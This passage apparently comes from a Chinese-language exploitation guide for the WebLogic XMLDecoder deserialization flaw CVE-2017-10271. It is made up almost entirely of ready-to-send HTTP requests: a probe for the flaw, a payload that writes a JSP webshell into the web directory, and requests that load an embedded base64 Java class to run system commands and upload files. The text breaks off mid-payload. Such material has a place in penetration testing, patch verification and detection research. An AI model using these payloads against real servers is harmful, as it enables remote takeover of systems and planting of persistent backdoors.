  85. wAAhSyq2ACLAACNMK7YAJE0stgAlTiu2ACYSJxIotgApOgQZBMYADRkEEiq2ACuZAD4rtgAmEiwS
  86. KLYAKToFGQXHAAcSLToFLBIuEi+2ADAZBbgAMToGLRkGtgAyLbYAMyy2ADQSKLYANacALhkEEja2
  87. ACuZACQrtgAmEjcSKLYAKToFK7YAJhI4Eii2ACk6BhkFGQa4ADmnAARLsQABAAAAmwCeAAwAAwA/
  88. AAAAVgAVAAAAFgAHABcADwAYABQAGQAZABoAJgAbADUAHABCAB0ARwAeAEsAIABTACEAWgAiAGAA
  89. IwBkACQAbQAlAHoAJgCHACcAlAAoAJsALACeACoAnwAuAEAAAABmAAoAQgArAFsASgAFAFoAEwBv
  90. AEoABgCHABQASQBKAAUAlAAHAEsASgAGAAcAlABwAHEAAAAPAIwAcgBzAAEAFACHAHQAdQACABkA
  91. ggBZAHYAAwAmAHUAdwBKAAQAnwAAAEcASAAAAEwAAAAtAAb/ADUABQcAeAcAeQcAegcAewcAXAAA
  92. /AAVBwBc+gAk/wAqAAAAAEIHAE0AAAEAfAAAAAIAfQ==</string></void></void><void class="weblogic.utils.classloaders.ClasspathClassLoader"><void method="defineCodeGenClass"><string>superman.shells.HttpEchoShell</string><object idref="byte_arr"></object><object class="java.net.URL"/></void></void></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

weblogic XMLDecoder反序列化漏洞 CVE-2017-10271 - 图1

下面这个payload会自动上传webshell到 web目录

  1. C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war
  1. POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
  2. Content-Type: text/xml
  3. User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
  4. Host: 192.168.23.216:7001
  5. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  6. Connection: keep-alive
  7. Content-Length: 966
  9. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork"><void method="getContext"><void method="getRootTempDir"><void method="getAbsolutePath"><void method="concat" id="path"><string>/war/999.jsp</string></void></void></void></void></void></void><object class="java.io.PrintWriter"><object idref="path"></object><void method="println"><string><![CDATA[123]]></string></void><void method="close"/></object><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork"><void method="getResponse"><void method="getServletOutputStream"><void method="flush"/></void><void method="getWriter"><void method="write"><string>xml_upload_ok</string></void></void></void></void></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

12.1.3 版本

漏洞探测

发送以下payload,出现 xml_test_ok 则说明存在漏洞 
  1. POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Host: 192.168.145.147:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
  4. Content-Type: text/xml
  5. Accept: */*
  6. Accept-Encoding: gzip, deflate
  7. Content-Length: 948
  9. <?xml version="1.0" encoding="utf-8"?>
  10. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  11.     <soapenv:Header>
  12.         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  13.             <java>
  14. <void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField">
  15. <string>connectionHandler</string>
  16. <void method="setAccessible"><boolean>true</boolean></void>
  17. <void method="get">
  18. <object idref="current_work"></object>
  19. <void method="getServletRequest">
  20. <void method="getResponse">
  21. <void method="getServletOutputStream">
  22. <void method="flush"/>
  23. </void>
  24. <void method="getWriter"><void method="write"><string>xml_test_ok</string></void></void>
  25. </void>
  26. </void>
  27. </void>
  28. </void>
  29. </void>
  30. </void>
  31. </void>
  32. </java>
  33.         </work:WorkContext>
  34.     </soapenv:Header>
  35.     <soapenv:Body/>
  36. </soapenv:Envelope>

命令执行

  1. POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Host: 192.168.145.147:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
  4. Content-Type: text/xml
  5. Accept: */*
  6. Accept-Encoding: gzip, deflate
  7. Content-Length: 7765
  9. <?xml version="1.0" encoding="utf-8"?>
  10. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  11.     <soapenv:Header>
  12.         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  13.         <java>
  14. <void class="sun.misc.BASE64Decoder">
  15. <void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIBEgcAAgEAIGNvbS9zdXBlcmVhbS9leHBsb2l0cy9YbWxBUElUZXN0BwAEAQAQamF2YS9sYW5nL09iamVjdAEAAWIBACdMd2VibG9naWMvdXRpbHMvZW5jb2RlcnMvQkFTRTY0RGVjb2RlcjsBAAg8Y2xpbml0PgEAAygpVgEABENvZGUHAAsBACV3ZWJsb2dpYy91dGlscy9lbmNvZGVycy9CQVNFNjREZWNvZGVyCgAKAA0MAA4ACAEABjxpbml0PgkAAQAQDAAFAAYBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUKAAMADQEABHRoaXMBACJMY29tL3N1cGVyZWFtL2V4cGxvaXRzL1htbEFQSVRlc3Q7AQAHZ2V0UGF0aAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7CgABABkMABoAGwEAGGdldEh0dHBDb25uZWN0aW9uSGFuZGxlcgEAMygpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvSHR0cENvbm5lY3Rpb25IYW5kbGVyOwoAHQAfBwAeAQAvd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9IdHRwQ29ubmVjdGlvbkhhbmRsZXIMACAAIQEAEWdldFNlcnZsZXRSZXF1ZXN0AQAwKClMd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVxdWVzdEltcGw7CgAjACUHACQBACx3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXF1ZXN0SW1wbAwAJgAnAQAKZ2V0Q29udGV4dAEAMigpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvV2ViQXBwU2VydmxldENvbnRleHQ7BwApAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIKACsALQcALAEALndlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvV2ViQXBwU2VydmxldENvbnRleHQMAC4ALwEADmdldFJvb3RUZW1wRGlyAQAQKClMamF2YS9pby9GaWxlOwoAMQAzBwAyAQAMamF2YS9pby9GaWxlDAA0ABcBAA9nZXRBYnNvbHV0ZVBhdGgKADYAOAcANwEAEGphdmEvbGFuZy9TdHJpbmcMADkAOgEAB3ZhbHVlT2YBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwoAKAA8DAAOAD0BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAD8BAAUvd2FyLwoAKABBDABCAEMBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsKACgARQwARgAXAQAIdG9TdHJpbmcIAEgBAAAHAEoBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAVaHR0cENvbm5lY3Rpb25IYW5kbGVyAQAxTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvSHR0cENvbm5lY3Rpb25IYW5kbGVyOwEAFHdlYkFwcFNlcnZsZXRDb250ZXh0AQAwTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvV2ViQXBwU2VydmxldENvbnRleHQ7AQANU3RhY2tNYXBUYWJsZQoAUQBTBwBSAQAQamF2YS9sYW5nL1RocmVhZAwAVABVAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7BwBXAQAbd2VibG9naWMvd29yay9FeGVjdXRlVGhyZWFkCgBWAFkMAFoAWwEADmdldEN1cnJlbnRXb3JrAQAdKClMd2VibG9naWMvd29yay9Xb3JrQWRhcHRlcjsKAAMAXQwAXgBfAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7CABhAQARY29ubmVjdGlvbkhhbmRsZXIKAGMAZQcAZAEAD2phdmEvbGFuZy9DbGFzcwwAZgBnAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwoAaQBrBwBqAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAGwAbQEADXNldEFjY2Vzc2libGUBAAQoWilWCgBpAG8MAHAAcQEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQANZXhlY3V0ZVRocmVhZAEAHUx3ZWJsb2dpYy93b3JrL0V4ZWN1dGVUaHJlYWQ7AQALd29ya0FkYXB0ZXIBABtMd2VibG9naWMvd29yay9Xb3JrQWRhcHRlcjsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAxiYXNlNjREZWNvZGUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwoACgB7DAB8AH0BAAxkZWNvZGVCdWZmZXIBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCCAB/AQAFVVRGLTgKADYAgQwADgCCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYHAIQBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQAQYmFzZTY0RGVjb2RlQnl0ZQEAEmdldFNlcnZsZXRSZXNwb25zZQEAMSgpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvU2VydmxldFJlc3BvbnNlSW1wbDsKACMAiwwAjACJAQALZ2V0UmVzcG9uc2UBAAhyZXNwb25zZQEAL0x3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXNwb25zZUltcGw7BwCQAQAtd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVzcG9uc2VJbXBsAQAEcGF0aAEACkV4Y2VwdGlvbnMKAAEAlAwAiACJCgCPAJYMAJcAmAEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7CgABAJoMABYAFwoAnACeBwCdAQATamF2YS9pby9QcmludFdyaXRlcgwAnwA9AQAFcHJpbnQBAAJ1cAgAogEAAToKADYApAwApQCmAQAFc3BsaXQBACcoTGphdmEvbGFuZy9TdHJpbmc7KVtMamF2YS9sYW5nL1N0cmluZzsKAAEAqAwAeAB5CACRCgA2AKsMAKwArQEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgoAAQCvDACHAH0KALEAswcAsgEAGHdlYmxvZ2ljL3V0aWxzL0ZpbGVVdGlscwwAtACCAQALd3JpdGVUb0ZpbGUIALYBAAt4bWxfdGVzdF9vawEABWJkYXRhAQAFZGF0YXMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQACb3ABAARkYXRhAQACW0IHALkBAANzYXkKADYAwAwAwQAXAQAEdHJpbQoANgDDDADEAMUBAAZsZW5ndGgBAAMoKUkIAMcBAAZ3aG9hbWkIAMkBAAdvcy5uYW1lCgDLAM0HAMwBABBqYXZhL2xhbmcvU3lzdGVtDADOAHkBAAtnZXRQcm9wZXJ0eQoANgDQDADRABcBAAt0b0xvd2VyQ2FzZQgA0wEAA3dpbgoANgDVDADWANcBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgcA2QEAE2phdmEvdXRpbC9BcnJheUxpc3QKANgADQgA3AEACS9iaW4vYmFzaAoA2ADeDADfAK0BAANhZGQIAOEBAAItYwgA4wEAB2NtZC5leGUIAOUBAAIvYwcA5wEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgoA5gDpDAAOAOoBABMoTGphdmEvdXRpbC9MaXN0OylWCgDmAOwMAO0A7gEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwoA5gDwDADxAPIBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwoAjwD0DAD1APYBABZnZXRTZXJ2bGV0T3V0cHV0U3RyZWFtAQA1KClMd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0T3V0cHV0U3RyZWFtSW1wbDsKAPgA+gcA+QEAEWphdmEvbGFuZy9Qcm9jZXNzDAD7APwBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07CgD+AQAHAP8BADF3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRPdXRwdXRTdHJlYW1JbXBsDAEBAQIBAAt3cml0ZVN0cmVhbQEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgoAnAEEDAEFAAgBAAVmbHVzaAEAA2NtZAEAB2lzTGludXgBAAFaAQAFb3NUeXABAARjbWRzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAOcHJvY2Vzc0J1aWxkZXIBABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABHByb2MBABNMamF2YS9sYW5nL1Byb2Nlc3M7AQAKU291cmNlRmlsZQEAD1htbEFQSVRlc3QuamF2YQAhAAEAAwAAAAEACgAFAAYAAAALAAgABwAIAAEACQAAACsAAgAAAAAAC7sAClm3AAyzAA+xAAAAAgARAAAABgABAAAALAASAAAAAgAAAAEADgAIAAEACQAAAC8AAQABAAAABSq3ABOxAAAAAgARAAAABgABAAAADgASAAAADAABAAAABQAUABUAAAACABYAFwABAAkAAACWAAMAAwAAAC8qtwAYTCvGACYrtgActgAiTbsAKFkstgAqtgAwuAA1twA7Ej62AEC2AESwTBJHsAABAAAAKgArAEkAAwARAAAAGgAGAAAAEQAFABIACQATABEAFAArABcALAAaABIAAAAgAAMAAAAvABQAFQAAAAUAJgBLAEwAAQARABoATQBOAAIATwAAAAcAAmsHAEkAAAIAGgAbAAEACQAAAKQAAgAEAAAAK7gAUMAAVkwrtgBYTSy2AFwSYLYAYk4txgASLQS2AGgtLLYAbsAAHbBMAbAAAQAAACcAKABJAAMAEQAAACIACAAAAB8ABwAgAAwAIQAWACIAGgAjAB8AJAAoACYAKQAqABIAAAAqAAQAAAArABQAFQAAAAcAIQByAHMAAQAMABwAdAB1AAIAFgASAHYAdwADAE8AAAAHAAJoBwBJAAACAHgAeQABAAkAAABlAAQAAwAAABW7ADZZsgAPK7YAehJ+twCAsE0SR7AAAQAAABAAEQCDAAMAEQAAAA4AAwAAAC8AEQAwABIAMgASAAAAFgACAAAAFQAUABUAAAAAABUAhQCGAAEATwAAAAYAAVEHAIMAAgCHAH0AAQAJAAAAWwACAAMAAAALsgAPK7YAerBNAbAAAQAAAAcACACDAAMAEQAAAA4AAwAAADYACAA3AAkAOQASAAAAFgACAAAACwAUABUAAAAAAAsAhQCGAAEATwAAAAYAAUgHAIMAAgCIAIkAAQAJAAAAdAABAAMAAAAVAUwqtwAYTSzGAAsstgActgCKTCuwAAAAAwARAAAAFgAFAAAAPQACAD4ABwA/AAsAQAATAEIAEgAAACAAAwAAABUAFAAVAAAAAgATAI0AjgABAAcADgBLAEwAAgBPAAAACwAB/QATBwCPBwAdAAEAkQAIAAIAkgAAAAQAAQBJAAkAAAA9AAIAAQAAAA8qtwCTtgCVKrcAmbYAm7EAAAACABEAAAAKAAIAAABGAA4ARwASAAAADAABAAAADwAUABUAAAABAJ8APQACAJIAAAAEAAEASQAJAAAARAACAAIAAAAMKrcAk7YAlSu2AJuxAAAAAgARAAAACgACAAAASgALAEsAEgAAABYAAgAAAAwAFAAVAAAAAAAMAIUAhgABAAEAoAA9AAIAkgAAAAQAAQBJAAkAAADiAAMABgAAAFIrEqG2AKNNLAMyTiosBDK3AKc6BBKpLbYAqpoAG7sAKFkqtwCZuAA1twA7GQS2AEC2AEQ6BCosBTK3AK46BRkFGQS4ALAqtwCTtgCVErW2AJuxAAAAAwARAAAAJgAJAAAATgAHAFAACwBRABQAUgAdAFQANQBWAD4AVwBFAFgAUQBZABIAAAA+AAYAAABSABQAFQAAAAAAUgC3AIYAAQAHAEsAuAC5AAIACwBHALoAhgADABQAPgCRAIYABAA+ABQAuwC8AAUATwAAAA4AAf4ANQcAvQcANgcANgABAL4APQACAJIAAAAEAAEASQAJAAABhgADAAgAAACmKiu3AKdMK8YADSu2AL+2AMKaAAYSxkwEPRLIuADKTi3GABEttgDPEtK2ANSZAAUDPbsA2Fm3ANo6BByZAB0ZBBLbtgDdVxkEEuC2AN1XGQQrtgDdV6cAGhkEEuK2AN1XGQQS5LYA3VcZBCu2AN1XuwDmWRkEtwDoOgUZBQS2AOtXGQW2AO86Biq3AJM6BxkHtgDzGQa2APe2AP0qtwCTtgCVtgEDsQAAAAMAEQAAAF4AFwAAAF0ABgBeABQAXwAXAGEAGQBiAB8AYwAvAGQAMQBnADoAaAA+AGkARgBqAE4AawBVAGwAWABtAGAAbgBoAG8AbwBxAHoAcgCBAHMAiAB0AI4AdQCbAHYApQB3ABIAAABSAAgAAACmABQAFQAAAAAApgEGAIYAAQAZAI0BBwEIAAIAHwCHAQkAhgADADoAbAEKAQsABAB6ACwBDAENAAUAiAAeAQ4BDwAGAI4AGACNAI4ABwBPAAAAEgAFFAL9ABkBBwA2/AAmBwDYFgABARAAAAACARE=</string>
  16. </void>
  17. </void>
  18. <void class="org.mozilla.classfile.DefiningClassLoader">
  19. <void method="defineClass">
  20. <string>com.supeream.exploits.XmlAPITest</string>
  21. <object idref="byte_arr"></object>
  22. <void method="newInstance">
  23. <void method="say" id="result">
  24. <string>aXBjb25maWcgL2FsbA==</string>
  25. </void>
  26. </void>
  27. </void>
  28. </void>
  29. </java>
  30. </work:WorkContext>
  31.     </soapenv:Header>
  32.     <soapenv:Body/>
  33. </soapenv:Envelope>

weblogic XMLDecoder反序列化漏洞 CVE-2017-10271 - 图2

文件上传

在 24行 中 的file开头的字符串为文件名与文件内容, 为 base64 编码

NUt2TEM3LmpzcA== 为文件名 会自动放在 /wls-wsat/ 目录下 后面的则是文件内容

把 file 改为 path 第二个参数文件名就要写绝对路径的base64编码

  1. POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Host: 192.168.145.147:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
  4. Content-Type: text/xml
  5. Accept: */*
  6. Accept-Encoding: gzip, deflate
  7. Content-Length: 11532
  9. <?xml version="1.0" encoding="utf-8"?>
  10. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  11.     <soapenv:Header>
  12.         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  13.             <java>
  14.                 <void class="sun.misc.BASE64Decoder">
  15. <void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIBEgcAAgEAIGNvbS9zdXBlcmVhbS9leHBsb2l0cy9YbWxBUElUZXN0BwAEAQAQamF2YS9sYW5nL09iamVjdAEAAWIBACdMd2VibG9naWMvdXRpbHMvZW5jb2RlcnMvQkFTRTY0RGVjb2RlcjsBAAg8Y2xpbml0PgEAAygpVgEABENvZGUHAAsBACV3ZWJsb2dpYy91dGlscy9lbmNvZGVycy9CQVNFNjREZWNvZGVyCgAKAA0MAA4ACAEABjxpbml0PgkAAQAQDAAFAAYBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUKAAMADQEABHRoaXMBACJMY29tL3N1cGVyZWFtL2V4cGxvaXRzL1htbEFQSVRlc3Q7AQAHZ2V0UGF0aAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7CgABABkMABoAGwEAGGdldEh0dHBDb25uZWN0aW9uSGFuZGxlcgEAMygpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvSHR0cENvbm5lY3Rpb25IYW5kbGVyOwoAHQAfBwAeAQAvd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9IdHRwQ29ubmVjdGlvbkhhbmRsZXIMACAAIQEAEWdldFNlcnZsZXRSZXF1ZXN0AQAwKClMd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVxdWVzdEltcGw7CgAjACUHACQBACx3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXF1ZXN0SW1wbAwAJgAnAQAKZ2V0Q29udGV4dAEAMigpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvV2ViQXBwU2VydmxldENvbnRleHQ7BwApAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIKACsALQcALAEALndlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvV2ViQXBwU2VydmxldENvbnRleHQMAC4ALwEADmdldFJvb3RUZW1wRGlyAQAQKClMamF2YS9pby9GaWxlOwoAMQAzBwAyAQAMamF2YS9pby9GaWxlDAA0ABcBAA9nZXRBYnNvbHV0ZVBhdGgKADYAOAcANwEAEGphdmEvbGFuZy9TdHJpbmcMADkAOgEAB3ZhbHVlT2YBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwoAKAA8DAAOAD0BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAD8BAAUvd2FyLwoAKABBDABCAEMBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsKACgARQwARgAXAQAIdG9TdHJpbmcIAEgBAAAHAEoBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAVaHR0cENvbm5lY3Rpb25IYW5kbGVyAQAxTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvSHR0cENvbm5lY3Rpb25IYW5kbGVyOwEAFHdlYkFwcFNlcnZsZXRDb250ZXh0AQAwTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvV2ViQXBwU2VydmxldENvbnRleHQ7AQANU3RhY2tNYXBUYWJsZQoAUQBTBwBSAQAQamF2YS9sYW5nL1RocmVhZAwAVABVAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7BwBXAQAbd2VibG9naWMvd29yay9FeGVjdXRlVGhyZWFkCgBWAFkMAFoAWwEADmdldEN1cnJlbnRXb3JrAQAdKClMd2VibG9naWMvd29yay9Xb3JrQWRhcHRlcjsKAAMAXQwAXgBfAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7CABhAQARY29ubmVjdGlvbkhhbmRsZXIKAGMAZQcAZAEAD2phdmEvbGFuZy9DbGFzcwwAZgBnAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwoAaQBrBwBqAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAGwAbQEADXNldEFjY2Vzc2libGUBAAQoWilWCgBpAG8MAHAAcQEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQANZXhlY3V0ZVRocmVhZAEAHUx3ZWJsb2dpYy93b3JrL0V4ZWN1dGVUaHJlYWQ7AQALd29ya0FkYXB0ZXIBABtMd2VibG9naWMvd29yay9Xb3JrQWRhcHRlcjsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAxiYXNlNjREZWNvZGUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwoACgB7DAB8AH0BAAxkZWNvZGVCdWZmZXIBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCCAB/AQAFVVRGLTgKADYAgQwADgCCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYHAIQBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQAQYmFzZTY0RGVjb2RlQnl0ZQEAEmdldFNlcnZsZXRSZXNwb25zZQEAMSgpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvU2VydmxldFJlc3BvbnNlSW1wbDsKACMAiwwAjACJAQALZ2V0UmVzcG9uc2UBAAhyZXNwb25zZQEAL0x3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXNwb25zZUltcGw7BwCQAQAtd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVzcG9uc2VJbXBsAQAEcGF0aAEACkV4Y2VwdGlvbnMKAAEAlAwAiACJCgCPAJYMAJcAmAEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7CgABAJoMABYAFwoAnACeBwCdAQATamF2YS9pby9QcmludFdyaXRlcgwAnwA9AQAFcHJpbnQBAAJ1cAgAogEAAToKADYApAwApQCmAQAFc3BsaXQBACcoTGphdmEvbGFuZy9TdHJpbmc7KVtMamF2YS9sYW5nL1N0cmluZzsKAAEAqAwAeAB5CACRCgA2AKsMAKwArQEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgoAAQCvDACHAH0KALEAswcAsgEAGHdlYmxvZ2ljL3V0aWxzL0ZpbGVVdGlscwwAtACCAQALd3JpdGVUb0ZpbGUIALYBAAt4bWxfdGVzdF9vawEABWJkYXRhAQAFZGF0YXMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQACb3ABAARkYXRhAQACW0IHALkBAANzYXkKADYAwAwAwQAXAQAEdHJpbQoANgDDDADEAMUBAAZsZW5ndGgBAAMoKUkIAMcBAAZ3aG9hbWkIAMkBAAdvcy5uYW1lCgDLAM0HAMwBABBqYXZhL2xhbmcvU3lzdGVtDADOAHkBAAtnZXRQcm9wZXJ0eQoANgDQDADRABcBAAt0b0xvd2VyQ2FzZQgA0wEAA3dpbgoANgDVDADWANcBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgcA2QEAE2phdmEvdXRpbC9BcnJheUxpc3QKANgADQgA3AEACS9iaW4vYmFzaAoA2ADeDADfAK0BAANhZGQIAOEBAAItYwgA4wEAB2NtZC5leGUIAOUBAAIvYwcA5wEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgoA5gDpDAAOAOoBABMoTGphdmEvdXRpbC9MaXN0OylWCgDmAOwMAO0A7gEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwoA5gDwDADxAPIBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwoAjwD0DAD1APYBABZnZXRTZXJ2bGV0T3V0cHV0U3RyZWFtAQA1KClMd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0T3V0cHV0U3RyZWFtSW1wbDsKAPgA+gcA+QEAEWphdmEvbGFuZy9Qcm9jZXNzDAD7APwBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07CgD+AQAHAP8BADF3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRPdXRwdXRTdHJlYW1JbXBsDAEBAQIBAAt3cml0ZVN0cmVhbQEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgoAnAEEDAEFAAgBAAVmbHVzaAEAA2NtZAEAB2lzTGludXgBAAFaAQAFb3NUeXABAARjbWRzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAOcHJvY2Vzc0J1aWxkZXIBABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABHByb2MBABNMamF2YS9sYW5nL1Byb2Nlc3M7AQAKU291cmNlRmlsZQEAD1htbEFQSVRlc3QuamF2YQAhAAEAAwAAAAEACgAFAAYAAAALAAgABwAIAAEACQAAACsAAgAAAAAAC7sAClm3AAyzAA+xAAAAAgARAAAABgABAAAALAASAAAAAgAAAAEADgAIAAEACQAAAC8AAQABAAAABSq3ABOxAAAAAgARAAAABgABAAAADgASAAAADAABAAAABQAUABUAAAACABYAFwABAAkAAACWAAMAAwAAAC8qtwAYTCvGACYrtgActgAiTbsAKFkstgAqtgAwuAA1twA7Ej62AEC2AESwTBJHsAABAAAAKgArAEkAAwARAAAAGgAGAAAAEQAFABIACQATABEAFAArABcALAAaABIAAAAgAAMAAAAvABQAFQAAAAUAJgBLAEwAAQARABoATQBOAAIATwAAAAcAAmsHAEkAAAIAGgAbAAEACQAAAKQAAgAEAAAAK7gAUMAAVkwrtgBYTSy2AFwSYLYAYk4txgASLQS2AGgtLLYAbsAAHbBMAbAAAQAAACcAKABJAAMAEQAAACIACAAAAB8ABwAgAAwAIQAWACIAGgAjAB8AJAAoACYAKQAqABIAAAAqAAQAAAArABQAFQAAAAcAIQByAHMAAQAMABwAdAB1AAIAFgASAHYAdwADAE8AAAAHAAJoBwBJAAACAHgA